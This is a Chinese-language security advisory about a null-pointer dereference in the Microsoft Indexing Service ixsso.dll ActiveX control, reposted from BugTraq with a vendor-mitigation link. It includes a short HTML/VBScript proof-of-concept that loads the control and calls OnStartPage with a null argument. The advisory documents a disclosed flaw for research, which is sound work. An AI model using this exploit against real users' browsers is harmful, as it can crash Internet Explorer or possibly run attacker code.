Microsoft Indexing Service 'ixsso.dll' ActiveX控件拒絕

發(fā)布日期：2012-08-24
更新日期：2012-08-28

受影響系統(tǒng)：
Microsoft Indexing Service
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 55202-
 

Microsoft Indexing Service是為簡單實現(xiàn)本地和網絡全文搜索引擎的一個服務。

Microsoft Indexing Service 'ixsso.dll' ActiveX控件在實現(xiàn)上存在空指針引用錯誤，通過誘使受害者打開調用了受影響控件的惡意網頁或HTML電子郵件，攻擊者可利用此漏洞造成IE拒絕服務，也可能執(zhí)行任意代碼。

<*來源：coolkaveh
 
  鏈接：http://support.microsoft.com/kb/240797
*>

測試方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能帶有攻擊性，僅供安全研究與教學之用。使用者風險自負！

coolkaveh （）提供了如下測試方法：

<html> Exploit <object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024' id='target' /></object> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\ixsso.dll" prototype = "Property Let OnStartPage As object" memberName = "OnStartPage" progid = "Cisso.CissoQuery" argCount = 1 Set arg1=Nothing target.OnStartPage arg1 </script>

建議：
--------------------------------------------------------------------------------
廠商補�。�

Microsoft
---------
Microsoft已經為此發(fā)布了一個安全公告（240797）以及相應補丁:

240797：如何禁止 ActiveX 控件在 Internet Explorer 中運行

鏈接：http://support.microsoft.com/kb/240797

服務器租用/服務器托管中國五強！虛擬主機域名注冊頂級提供商！15年品質保障！--億恩科技[ENKJ.COM]